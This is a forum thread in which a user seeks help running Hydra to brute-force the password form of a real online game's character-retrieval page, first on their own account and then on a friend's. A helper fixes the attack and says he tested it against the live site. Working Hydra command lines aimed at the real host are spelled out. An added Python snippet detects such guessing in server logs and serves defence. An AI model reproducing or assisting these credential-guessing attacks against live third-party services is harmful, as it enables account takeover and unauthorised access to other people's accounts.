Hydra All Passwords Valid

Jusline
n00b
Posts: 3
Joined: Mon Sep 26, 2016 2:56 pm

Hydra All Passwords Valid

Post by Jusline » Mon Sep 26, 2016 3:05 pm

I'm trying to hack my own account in a game I play called Furcadia. It's a Windows client-based game, therefore doesn't have a login page. However, it has a page where you can retrieve your character information and such with the username and password.

http://www.furcadia.com/services/retrieve/retrieve.php4

When the login doesn't work, it states "Sorry, the passwords did not match."

My code: hydra -l Butters -P hippo.txt 72.232.1.185 http-form-post "/services/retrieve/retrieve.php4:user_name=^USER^&password=^PASS^:Sorry, the passwords did not match."

This still finds all passwords to be valid.

If the password is correct, it prompts the user to save an ini file. This means I don't have another web page, or "successful login" to add to a different string.

hydra -l Butters -P hippo.txt 72.232.1.185 http-form-post "/services/retrieve/retrieve.php4:user_name=^USER^&password=^PASS^:S=cmd retrieve"

This doesn't work. 0 valid passwords found. I've gone through Wireshark, Burp Suite, and inspect element. I simply cannot figure out for the life of me how to get this to work. I've spent a ton of hours on this, and while it's been fun trying to figure it out I'm starting to get a headache. I appreciate any help in advance. :)

Cool_Fire
Not a sandwich
Posts: 1912
Joined: Fri May 09, 2003 1:20 pm
Location: 41 6d 73 74 65 72 64 61 6d

Re: Hydra All Passwords Valid

Post by Cool_Fire » Mon Sep 26, 2016 4:25 pm

My very first suggestion would be to use the full hostname rather than the IP address.

The server decides which website to load based on the Host header hydra sends, and if you use the plain IP address, it won't know what website it belongs to and will load a default (which is the wrong one in this case).

There's also a hidden field and a checkbox that you might have to submit. Whether you can omit these will depend on how the form is handled, but you should just be able to add them directly to your hydra command like so:
...ve.php4:cmd=retrieve&whatever=else_they_submit&user_name=^USER^...

Side note: It's usually easier to just capture a login attempt with a packet sniffer or a browser plugin rather than trying to work it out by looking at the HTML form.

Edit:
Just tried it to make sure. With "...php4:cmd=retrieve&user_name=^USER^&password=^PASS^:Sorry" it should absolutely work.
If we're breaking the rules, then how come you can't catch us? You can't find us? I know why. Cause, it's ... MAGIC!
Hackerthreads chat, where the party is going 24/7.
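
Seen from the server operator's side, both things discussed above leave traces in an access log: repeated POSTs to the retrieve endpoint from one client, and requests addressed to the bare IP, which land on the default site. The following is an added example, not written by anyone in this thread; the log layout (Host header logged first, as Apache's `%{Host}i` would), the thresholds and the sample lines are assumptions constructed for illustration.

```python
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime

RETRIEVE_PATH = "/services/retrieve/retrieve.php4"  # endpoint named in the thread
# Assumed layout: Host-header client [time] "request" status bytes
LINE = re.compile(
    r'(?P<host>\S+) (?P<client>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

def sample_lines():
    """Constructed log lines (documentation-range client IPs), not real traffic."""
    fmt = ('{host} {client} [26/Sep/2016:15:{m:02d}:{s:02d} +0000] '
           '"POST ' + RETRIEVE_PATH + ' HTTP/1.1" 200 {size}')
    # A normal user: two retrievals several minutes apart, sent to the real hostname.
    lines = [fmt.format(host="www.furcadia.com", client="198.51.100.7", m=0, s=5, size=812),
             fmt.format(host="www.furcadia.com", client="198.51.100.7", m=7, s=40, size=1530)]
    # A guessing tool: eight POSTs in eight seconds, addressed to the bare IP.
    lines += [fmt.format(host="72.232.1.185", client="203.0.113.9", m=1, s=s, size=4096)
              for s in range(8)]
    return lines

def is_ip_literal(host):
    """True when the Host header was an IP address rather than a site name."""
    if host.count(":") == 1:          # strip an IPv4-style ":port" suffix
        host = host.split(":")[0]
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False

def detect(lines, max_posts=5, window_s=60):
    """Return clients that burst-POST the retrieve form or address it by IP."""
    recent = defaultdict(deque)       # client -> timestamps inside the window
    findings = {"burst": set(), "ip_host": set()}
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST" or m["path"] != RETRIEVE_PATH:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if is_ip_literal(m["host"]):
            findings["ip_host"].add(m["client"])
        q = recent[m["client"]]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()               # drop attempts older than the window
        if len(q) > max_posts:
            findings["burst"].add(m["client"])
    return findings
```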


Hydra is giving all sorts of incorrect passwords

Post by Jusline » Thu Sep 29, 2016 1:41 pm

I will have hydra running for 24 hours and it will finally give me a valid password, however that "valid" password is incorrect. I was helped recently in order to get the attack to work in general. It worked on my own account, which had a password document of about 10 words in it. Now I'm testing a password find on my friend's account, who has approved and didn't make the password too difficult. (I didn't want to find out her actual password in case she uses it everywhere, for her privacy.)

Here is my code:

hydra -l [redacted] -P rockyou.txt http://www.furcadia.com http-form-post "/services/retrieve/retrieve.php4:cmd=retrieve&user_name=^USER^&password=^PASS^:Sorry"

I have also tried:


hydra -l [redacted] -P rockyou.txt http://www.furcadia.com http-form-post "/services/retrieve/retrieve.php4:cmd=retrieve&user_name=^USER^&password=^PASS^:Sorry, the passwords did not match."

Thank you in advance!
Last edited by Cool_Fire on Fri Sep 30, 2016 6:01 am, edited 1 time in total.
Reason: Merged posts and redacted username from commandline


Re: Hydra is giving all sorts of incorrect passwords

Post by Jusline » Thu Sep 29, 2016 10:52 pm

Not sure if it'll do anything different but I'm trying http-post-form instead of form-post at the moment.


Re: Hydra All Passwords Valid

Post by Cool_Fire » Fri Sep 30, 2016 6:00 am

It's hard to say why it's telling you the password is valid. I'd first try the user/password manually to see if the response is any different from other passwords when you try it by hand.

Other than that, it may occasionally generate some error which produces a false positive in Hydra. Without logs or packet traces from the actual request Hydra made, it's going to be pretty difficult to find out exactly what happened.